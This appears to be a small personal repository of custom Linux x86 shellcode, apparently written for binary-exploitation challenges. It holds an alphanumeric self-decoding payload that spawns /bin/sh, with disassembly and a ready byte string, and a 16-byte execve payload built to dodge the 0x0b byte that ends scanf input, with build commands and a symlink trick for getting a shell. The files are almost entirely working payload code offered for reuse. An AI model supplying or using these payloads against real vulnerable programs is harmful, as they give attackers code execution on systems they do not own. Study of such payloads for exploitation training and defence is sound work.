├── README.md
├── linux_x86_alphanumeric_edx_offset_binsh_shellcode.asm
└── linux_x86_execve_no_whitespace.asm


/README.md:
--------------------------------------------------------------------------------
1 | # Shellcodes
2 | I'll post my custom shellcode I make here!
3 | 


--------------------------------------------------------------------------------
/linux_x86_alphanumeric_edx_offset_binsh_shellcode.asm:
--------------------------------------------------------------------------------
 1 | ;Stub decoder
 2 | ;|           0x08000110      6a69           push 0x69                   ; 'i' ; 105 ; [01] -r-x section size 48 named .text
 3 | ;|           0x08000112      5b             pop ebx
 4 | ;|           0x08000113      285a31         sub byte [edx + 0x31], bl
 5 | ;|           0x08000116      285a3d         sub byte [edx + 0x3d], bl
 6 | ;|           0x08000119      285a3d         sub byte [edx + 0x3d], bl
 7 | ;|           0x0800011c      285a3e         sub byte [edx + 0x3e], bl
 8 | ;|           0x0800011f      285a3f         sub byte [edx + 0x3f], bl
 9 | ;|           0x08000122      285a3f         sub byte [edx + 0x3f], bl
10 | ;|           0x08000125      285a41         sub byte [edx + 0x41], bl
11 | ;|           0x08000128      285a42         sub byte [edx + 0x42], bl
12 | ;|           0x0800012b      285a43         sub byte [edx + 0x43], bl
13 | ;|           0x0800012e      285a44         sub byte [edx + 0x44], bl
14 | ;|           0x08000131      285a45         sub byte [edx + 0x45], bl
15 | ;|           0x08000134      285a46         sub byte [edx + 0x46], bl
16 | ;|           0x08000137      285a47         sub byte [edx + 0x47], bl
17 | ;|           0x0800013a      285a48         sub byte [edx + 0x48], bl
18 | ;\           0x0800013d      285a48         sub byte [edx + 0x48], bl
19 | 
20 | ;Spawn /bin/sh:
21 | ;|           0x08000110      31c0           xor eax, eax                ; [01] -r-x section size 25 named .text
22 | ;|           0x08000112      50             push eax
23 | ;|           0x08000113      682f2f7368     push 0x68732f2f             ; '//sh'
24 | ;|           0x08000118      682f62696e     push 0x6e69622f             ; '/bin'
25 | ;|           0x0800011d      89e3           mov ebx, esp
26 | ;|           0x0800011f      99             cdq
27 | ;|           0x08000120      31c9           xor ecx, ecx
28 | ;|           0x08000122      b80b000000     mov eax, 0xb                ; 11
29 | ;\           0x08000127      cd80           int 0x80
30 | 
31 | ; This alphanumeric shellcode requires EDX to be set to the address of the first byte of the shellcode
32 | ; in this shellcode the first byte is 0x6a.
33 | ; I created this shellcode for a binary challenge I was doing recently.
34 | ; In that challenge I was able to get EDX to point at the first byte of my shellcode and execute from EDX.
35 | ; This shellcode decodes part of itself and spawns /bin/sh
36 | ; Shellcode: sc = ("\x6a\x69\x5b\x28\x5a\x31\x28\x5a\x3d\x28\x5a\x3d\x28\x5a\x3e\x28\x5a\x3f\x28\x5a\x3f\x28\x5a\x41\x28\x5a\x42\x28\x5a\x43\x28\x5a\x44\x28\x5a\x45\x28\x5a\x46\x28\x5a\x47\x28\x5a\x48\x28\x5a\x48\x31\x29\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x5b\x4c\x6b\x31\x32\x21\x74\x69\x69\x69\x36\x52")
37 | ; Length: 73 bytes
38 | global _start
39 | section .text
40 | _start:
41 |     db 0x6a,0x69,0x5b,0x28,0x5a,0x31,0x28,0x5a,0x3d,0x28,0x5a,0x3d,0x28,0x5a,0x3e,0x28,0x5a,0x3f,0x28,0x5a,0x3f,0x28,0x5a,0x41,0x28,0x5a,0x42,0x28,0x5a,0x43,0x28,0x5a,0x44,0x28,0x5a,0x45,0x28,0x5a,0x46,0x28,0x5a,0x47,0x28,0x5a,0x48,0x28,0x5a,0x48,0x31,0x29,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x5b,0x4c,0x6b,0x31,0x32,0x21,0x74,0x69,0x69,0x69,0x36,0x52
42 | 


--------------------------------------------------------------------------------
/linux_x86_execve_no_whitespace.asm:
--------------------------------------------------------------------------------
 1 | ; To create the binary
 2 | ; nasm -f elf32 linux_x86_execve_no_whitespace.asm -o sc.o
 3 | ; ld sc.o -o sc
 4 | 
 5 | ; Use objdump or some other tool to extract shellcode from sc binary!
 6 | 
 7 | ; 'e' execve shellcode by @Pink_P4nther.
 8 | ; The point of this shellcode is to bypass when 0x0b (11) is a bad byte.
 9 | ; This helped when giving overflow input to scanf() for example.
10 | ; scanf() sees 0x0b as white space therefore ending the read from STDIN.
11 | ; I also made it as small as possible so the executable name is now 'e'
12 | ; make sure to create a link to whatever you want to execute and name the link 'e'
13 | ; For example: `ln -s /bin/sh e` <- For a shell
14 | ; 16 bytes.
15 | 
16 | ; sc = ("\x31\xc0\x50\x6a\x65\x89\xe3\x99\x31\xc9\x04\x0e\x2c\x03\xcd\x80")
17 | 
18 | section .text
19 | 
20 | global _start
21 | 
22 | _start:
23 | 	xor eax,eax     ; Zero eax
24 | 	push eax        ; Put 0 on the stack
25 | 	push 0x65	; Put 'e' on the stack
26 | 	mov ebx,esp     ; Move address of 'e' into ebx
27 | 	cdq             ; Zero edx
28 | 	xor ecx,ecx     ; Zero ecx
29 | 	add al,0xe      ; Add 14 to eax
30 | 	sub al,0x3	; Subtract 3 from eax to put 0xb (11) in eax
31 | 	int 0x80        ; Software interrupt for system call
32 | 


--------------------------------------------------------------------------------